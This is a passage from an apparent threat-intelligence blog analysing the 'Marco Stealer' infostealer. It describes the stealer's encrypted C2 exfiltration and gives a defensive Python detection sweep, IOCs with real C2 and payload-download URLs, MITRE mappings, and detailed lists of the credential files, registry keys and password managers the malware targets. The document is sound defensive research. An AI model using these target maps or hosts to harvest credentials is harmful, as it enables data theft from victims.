Upon locating extension directories containing cryptocurrency wallet data, the information stealer extracts, encrypts, and exfiltrates the data to a C2 server.Data collected across popular servicesMarco Stealer collects data from different software, applications, and services. Visit the Appendix section of this blog for a comprehensive table that includes the file paths or registry keys targeted, data collected, and additional technical details clarifying how this data is leveraged or encrypted/decoded.Additional data theftClipboard content is also targeted, with Marco Stealer harvesting data for any sensitive information copied by the user. Marco Stealer is also capable of capturing screenshots, and designed to recursively search through a wide range of commonly used local directories and cloud service locations to locate sensitive files, such as:AppDataLocalDesktopDocumentsDownloadsPicturesVideosMusicOneDriveDropboxGoogle DriveMicrosoftOneDriveMicrosoftOfficeDropboxThe information stealer looks for files with names or extensions that are likely to contain confidential information. Visit the Appendix section at the end of this blog for a table that shows targeted file patterns (text, documents, spreadsheets, database, images, and backup files) identified using keywords.C2 communicationMarco Stealer uses AES-256 CBC encryption to protect stolen data that is sent to its C2 server. To begin the encryption process, the information stealer generates a SHA-256 hash of a hardcoded value. The resulting hash is used to derive an AES-256 encryption key via the CryptDeriveKey function. While the AES encryption key is derived dynamically, the result will always be the same and thus the actual key is static. 
The encrypted data, including the victim's client ID and hardware ID, is then sent to the predefined C2 endpoint (e.g., http://45.74.19[.]20:49259/receive) via an HTTP POST request with the HTTP User-Agent header set to DataSender. Prior to encryption, the data in the HTTP body has the following format:

Client ID: [client_id]
Hardware ID: [hwid]
IP Address: [ip_addr]
Stolen data
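The artifacts described in this section lend themselves to simple host and network rules. The Python below is an added example, not code from the ThreatLabz post or from the malware: it sweeps constructed Sysmon-style events and proxy records for the FirefoxBrowserExtractor named pipe, loads of chromeDecryptor.dll or needMe.exe, the chrome_appbound_key.txt drop, and the POST to /receive carrying the DataSender User-Agent. It also reproduces the static key derivation: when CryptDeriveKey is given a SHA-256 hash and asked for an AES-256 key, the 32-byte digest is used directly as the key, so the key never changes for a given hardcoded input (that input is not published here and is replaced by a placeholder), and it splits a decrypted POST body into the fields shown above. All telemetry field names, sample paths, and the 203.0.113.10 address are constructed for the example.

```python
"""Sweep constructed host and proxy telemetry for the Marco Stealer artifacts
described in this post. Added example, not ThreatLabz or malware code.
Field names loosely follow Sysmon (EventID 7 image load, 11 file create,
17 pipe created, 18 pipe connected); every record, path and address is constructed."""
import hashlib
from urllib.parse import urlparse

# Host artifacts named in the analysis (pipe compared by its final component,
# since Sysmon logs pipe names without the \\.\pipe\ prefix).
MARCO_PIPE_NAME = "firefoxbrowserextractor"      # \\.\pipe\FirefoxBrowserExtractor
MARCO_MODULES = {"chromedecryptor.dll", "needme.exe"}
MARCO_KEY_FILE = "chrome_appbound_key.txt"
# Network artifacts: the C2 POST carries this User-Agent and endpoint path.
MARCO_USER_AGENT = "DataSender"
MARCO_C2_PATH = "/receive"


def _basename(path: str) -> str:
    """Last component of a Windows path or pipe name, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def check_host_event(ev: dict):
    """Return a finding string for one Sysmon-style event, or None."""
    eid, image = ev.get("EventID"), ev.get("Image", "?")
    if eid in (17, 18) and _basename(ev.get("PipeName", "")) == MARCO_PIPE_NAME:
        verb = "created" if eid == 17 else "connected to"
        return f"{image} {verb} pipe {ev['PipeName']}"
    if eid == 7 and _basename(ev.get("ImageLoaded", "")) in MARCO_MODULES:
        return f"{image} loaded {ev['ImageLoaded']}"
    if eid == 11 and _basename(ev.get("TargetFilename", "")) == MARCO_KEY_FILE:
        return f"{image} wrote {ev['TargetFilename']}"
    return None


def check_http_request(req: dict):
    """Return a finding string for one proxy record, or None."""
    if req.get("method") != "POST" or req.get("user_agent") != MARCO_USER_AGENT:
        return None
    url = urlparse(req.get("url", ""))
    if url.path != MARCO_C2_PATH:
        return None
    return f"POST to {url.netloc}{url.path} with User-Agent {MARCO_USER_AGENT}"


def sweep(host_events, http_requests):
    """Apply both rule sets and collect the findings."""
    hits = [check_host_event(ev) for ev in host_events]
    hits += [check_http_request(req) for req in http_requests]
    return [h for h in hits if h]


def derive_static_key(hardcoded_value: bytes) -> bytes:
    """Reproduce the key derivation: SHA-256 over the hardcoded value, then
    CryptDeriveKey. For a SHA-2 digest at least as long as the requested
    AES-256 key, CryptDeriveKey uses the digest bytes directly, which is why
    the key is identical on every run. The real input is a placeholder here."""
    return hashlib.sha256(hardcoded_value).digest()


def parse_exfil_body(plaintext: str) -> dict:
    """Split a decrypted POST body into its labelled header fields and the
    stolen-data payload that follows them."""
    lines = plaintext.splitlines()
    fields, i = {}, 0
    for label in ("Client ID", "Hardware ID", "IP Address"):
        if i < len(lines) and lines[i].startswith(label + ":"):
            fields[label] = lines[i].split(":", 1)[1].strip()
            i += 1
    fields["stolen_data"] = "\n".join(lines[i:])
    return fields


# Constructed telemetry: four host records and one request should match.
SAMPLE_HOST_EVENTS = [
    {"EventID": 17, "Image": r"C:\Users\victim\AppData\Local\Temp\loader.exe",
     "PipeName": r"\FirefoxBrowserExtractor"},
    {"EventID": 18, "Image": r"C:\Users\victim\AppData\Local\Temp\needMe.exe",
     "PipeName": r"\FirefoxBrowserExtractor"},
    {"EventID": 17, "Image": r"C:\Windows\System32\svchost.exe",
     "PipeName": r"\srvsvc"},
    {"EventID": 7, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ImageLoaded": r"C:\Users\victim\AppData\Local\Temp\chromeDecryptor.dll"},
    {"EventID": 11, "Image": r"C:\Users\victim\AppData\Local\Temp\loader.exe",
     "TargetFilename": r"C:\Users\victim\AppData\Local\Temp\chrome_appbound_key.txt"},
]
SAMPLE_HTTP_REQUESTS = [
    {"method": "POST", "url": "http://203.0.113.10:49259/receive", "user_agent": "DataSender"},
    {"method": "GET", "url": "https://www.example.com/receive", "user_agent": "Mozilla/5.0"},
    {"method": "POST", "url": "https://api.example.com/upload", "user_agent": "DataSender"},
]

if __name__ == "__main__":
    for finding in sweep(SAMPLE_HOST_EVENTS, SAMPLE_HTTP_REQUESTS):
        print("ALERT:", finding)
```

The pipe rule matches on both Sysmon event 17 (pipe created, the stealer's server side) and event 18 (pipe connected, the needMe.exe client side), so either component alone is enough to raise a finding; the HTTP rule deliberately requires all three of POST, the DataSender User-Agent and the /receive path, so a GET to a same-named path or an unrelated upload with the same User-Agent is not flagged.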
Conclusion

Marco Stealer is a new information stealer designed to steal browser data, cryptocurrency wallet information, and sensitive files (both locally and from cloud services). The malware employs string encryption and attempts to defeat dynamic analysis tools. Network communications carrying stolen data over HTTP are protected with AES-256 encryption. Despite recent law enforcement actions that have taken aim at several information stealers such as Rhadamanthys and Lumma, the market for these malware tools remains significant. As a result, new information stealers are regularly being created and continue to pose significant threats to corporate environments.

Zscaler Coverage

The Zscaler Cloud Sandbox has been successful in detecting this campaign. The figure below depicts the Zscaler Cloud Sandbox, showing detection details for Marco Stealer.

Figure 2: Zscaler Cloud Sandbox report for Marco Stealer.

In addition to sandbox detections, Zscaler's multilayered cloud security platform detects indicators related to this campaign at various levels with the following threat names:

- Win64.Downloader.Marco
- Win64.PWS.Marco

Indicators Of Compromise (IOCs)

| IOC | Type |
| --- | --- |
| http[:/]/217[.]156[.]50[.]228[:]8185/LoqnOOuuIsTIYfkrdsfL/eUelHAyY.exe | Downloading URL |
| 34deb6594098545d7ffb98844f0790bf | ZIP |
| 3a3e8f6bc70748a39ffc047b3c86a665 | ZIP |
| 5eb91d1ad26c7eced894e34710aaa28e | ZIP |
| 1042affb0ca6758ca0043112cdc7eda2 | Downloader |
| a98fa5fba55e470750ae74186c15fa73 | Downloader |
| 33dd8a5e234d911391cc8c301dc4a606 | Downloader |
| 49ab8d4c55b7f64eaba699ef0dc9054b | Marco Stealer |
| 661a5465d9a322276ebc414f39891a8b | Marco Stealer |
| 028604d6aa556de2ae4ca6b31e600677 | Marco Stealer |
| http[://]107[.]189[.]25[.]189[:]49259/receive | C2 server |
| http[://]45[.]74[.]19[.]20[:]49259/receive | C2 server |

MITRE ATT&CK Framework

| Tactic | ID | Technique Name | Description |
| --- | --- | --- | --- |
| Execution, Defense Evasion, Discovery | T1047 | Windows Management Instrumentation | Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and scripts, collect information about the system, or to establish persistence. |
| Discovery | T1016 | System Network Configuration Discovery | Adversaries may attempt to get information about the network configuration of a system or systems, including IP address, DNS servers, and network adapters. |
| Command and Control | T1071 | Application Layer Protocol | Adversaries may communicate using application layer protocols to avoid detection, blend in with legitimate network traffic, or enable C2 on a network that restricts other protocols. |
| Execution | T1059 | Command and Scripting Interpreter | Adversaries may abuse command and scripting interpreters to execute commands, scripts, or binaries. These interpreters are often pre-installed on systems, such as cmd.exe, PowerShell, or Python. |
| Discovery | T1057 | Process Discovery | Adversaries may attempt to get information about running processes on a system. This information can be used to identify security solutions, analyze running services, or to find processes that can be injected. |
| Execution, Command and Control | T1105 | Ingress Tool Transfer | Adversaries may transfer tools or other files from an external system into a compromised environment. This can be done via various means, including HTTP/S, FTP, SMB, or custom protocols. |
| Discovery | T1082 | System Information Discovery | Adversaries may attempt to get detailed information about the operating system and hardware, including the system's name, version, and architecture. This information helps in further planning and execution of attacks. |
| Command and Control | T1573 | Encrypted Channel | Adversaries may communicate using a channel that has been encrypted to conceal the content of their traffic. This can be done using standard encryption protocols like TLS/SSL or custom encryption schemes. |
| Discovery | T1518.001 | Security Software Discovery | Adversaries may attempt to get information about installed security software and tools, such as antivirus, EDR solutions, or firewalls. This helps them identify potential defenses to bypass or disable. |

Appendix

Anti-analysis tools

The list below includes the anti-analysis tools (matched by window title or process description) targeted by Marco Stealer.

- Cheat Engine
- dnspy
- ILSpy
- Wireshark
- Process Monitor
- VB PCode Decompiler
- Process Hacker
- WinHex
- PE Explorer
- Dumpcap
- Malware Initial Assessment
- Decompiler for p-code and native code files
- Common File Format Explorer
- Hex Workshop
- W32Dasm for Windows
- HxD Hex Editor
- np
- DB Browser for SQLite
- rmega dump
- ollydbg
- Interactive Delphi Reconstructor
- The InteractiveDisassembler
- x64dbg
- Hacker's Disassembler
- System Informer
- Navicat Premium
- 3Stud_PE MFC Application
- The Interactive Disassembler
- ExEinfo PE – Win32 exe identifier
- Java(TM) Platform SE binary
- System activity monitor
- Regshot 1.9.0 x86
- Sysinternals Process Explorer
- Autostart program viewer
- Resource viewer
- Sysinternals Tcp View
- Regshot 1.9.0 x64 ANSI
- OpenJDK Platform binary
- API Monitor v2 (Alpha) 32-bit
- Regshot 1.9.0 x64 Unicode
- Tiny AutoIt3 Decompiler Editor
- API Monitor v2 (Alpha) 64-bit
- Regshot 1.9.0 x86 Unicode
- EnigmaVBUnpacker – static Enigma Virtual Box unpacker
- 010 Editor – Pro Text/Hex Editor
- PiD Team's Protection ID.-bit
- Nauz File Detector(NFD) is a linker/compiler/packer identifier utility
- Restorator: Edit Resources and User Interface

System data collected

The list below shows the system data collected by Marco Stealer.

- Client ID
- Hardware ID
- IP address
- Country code
- OS version
- Local date
- Time zone
- ComputerNameA
- UserNameA
- Hostname
- ComputerNameNetBIOS
- Language
- Antivirus software
- RAM size
- CPU vendor
- CPU name
- CPU threads
- CPU cores
- GPU(s)
- Display resolution
- Installed software
- Running processes
- Clipboard content
- Screenshot data

Targeted file patterns

The following tables show the targeted file patterns (text, documents, spreadsheets, database, images, and backup files) identified using keywords.

Private information: *private*.txt, *secret*.txt, *important*.txt, *note*.txt, *data*.txt

Credentials and authentication: *password*.doc, *pass*.txt, *login*.txt, *cred*.txt, *auth*.txt, *2fa*.txt, *otp*.txt, *account*.xls, *ssn*.txt
Cryptocurrency-related data: *wallet*.txt, *bitcoin*.txt, *btc*.txt, *eth*.txt, *ledger*.txt, *trezor*.txt, *metamask*.txt, *coinbase*.txt, *binance*.txt, *exodus*.txt, *electrum*.txt, *trust*.txt, *seed*.png

Financial data: *bank*.jpg, *card*.jpg, *invoice*.pdf, *tax*.pdf, *backup*.sql, *account*.accdb

Password manager files: *.kbdx, *.kdb, *.1pif, *.opvault, *.agilekeychain, *.lastpass, *.dashlane

Screenshots or captured images: *screen*.jpg, *printscreen*.jpg, *screenshot*.png, *snip*.png, *capture*.png

Popular services

The following entries list, per function, the file paths or registry keys targeted, the data collected, and additional technical details on how this data is leveraged or encrypted/decoded.

Discord Data
- File/registry path: AppData\Roaming\Discord\Local Storage\leveldb; AppData\Roaming\Discordptb\Local Storage\leveldb; AppData\Roaming\Discordcanary\Local Storage\leveldb; AppData\Roaming\Lightcord\Local Storage\leveldb
- Data collected: tokens, cookies, and more
- Additional information: Marco Stealer retrieves file metadata fields such as nFileSizeLow, nFileSizeHigh, ftLastWriteTime, and dwFileAttributes, which help determine file presence, modification timestamps, and other file system attributes before attempting to read or extract the data.

Telegram Data
- File/registry path: AppData\Roaming\Telegram Desktop\tdata
- Data collected: countries, key_datas, prefix, settings, shortcuts-custom.json, shortcuts-default.json, usertag, content
- Additional information: The decryption keys are stored locally in key_datas.

Steam Video Game
- File/registry path: Software\Valve\Steam\a_1; Software\Valve\Steam\config\config.vdf
- Additional information: To parse the contents of config.vdf, Marco Stealer employs the regular expression "([^"]*)"\s+"([^"]*)".

Proton VPN
- File/registry path: AppData\Local\Proton\Proton VPN
- Data collected: Data under "Proton\Proton VPN"
- Additional information: Marco Stealer performs a memory scan in the backward direction, searching for ProtonVPN-associated URLs like "ProtonVPN_Url" and content artifacts.

FileZilla
- File/registry path: %APPDATA%\FileZilla
- Data collected: recentservers.xml, sitemanager.xml
- Additional information: These XML files store FTP connection profiles, including host, port, username, and password fields, in plaintext or Base64-encoded plaintext.

Windscribe
- File/registry path: HKEY_CURRENT_USER\Software\Windscribe\Installer; HKEY_CURRENT_USER\Software\Windscribe\Windscribe2
- Data collected: sensitive fields such as authHash, userId, wireguardConfig, and customOvpnAuths
- Additional information: These fields contain hashed credentials, unique user identifiers, VPN configuration for both OpenVPN and WireGuard, and internal VPN engine or networking settings.

Ubisoft Game Launcher
- File/registry path: AppData\Local\Ubisoft Game Launcher
- Data collected: All files at Ubisoft Game Launcher.*

Battle.net
- File/registry path: AppData\Local\Battle.net
- Data collected: ".config" and ".db" at the given path
- Additional information: Marco Stealer specifically looks for critical files such as ".config" and ".db", which may contain sensitive configuration or database information.

Outlook
- File/registry path: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A66768A
- Data collected: SMTP Email Address2, SMTP Server, POP3 User Name9, NNTP Email Address, NNTP User Name, IMAP Server, IMAP User Name, Email, HTTP User, HTTP Server URL, POP3 User, IMAP User, HTTPMail User Name, HTTPMail Server, SMTP User, POP3 Password2, IMAP Password2, NNTP Password2, HTTPMail Password2, SMTP Password2, POP3 Password, IMAP Password, NNTP Password, and HTTPMail Password
- Additional information: After decrypting the strings listed above, Marco Stealer enumerates them, indicating that this functionality enumerates user email profile information from the registry.

Password Manager
- File/registry path: Appdata\Local (the location varies between password managers)
- Data collected: 1Password Nightly, commonkey, dashlane, KeePassXC, Keeper, LastPass, MYKI, NordPass, RoboForm, Splikity, Zoho Vault, 1Password Beta, Bitwarden
- Additional information: By locating and accessing the data directories or configuration files associated with these applications, Marco Stealer attempts to extract saved credentials.
Targeted browsers

The following list is a comprehensive list of browsers targeted by Marco Stealer.

- Google Chrome
- Epic Privacy Browser
- AVAST Software Browser
- Lenovo SLBrowser
- BraveSoftware
- Google Chrome Dev
- CentBrowser
- Comodo Dragon
- BlackHawk Browser
- Coowon Coowon
- Google Chrome Beta
- Google Chrome SxS
- Blisk
- CryptoTab Browser
- AVG Browser
- InsomniacBrowser
- CCleaner Browser
- Liebao
- AIChromium
- CatalinaGroup Citrio
- CocCoc Browser
- Microsoft Edge Dev
- Microsoft Edge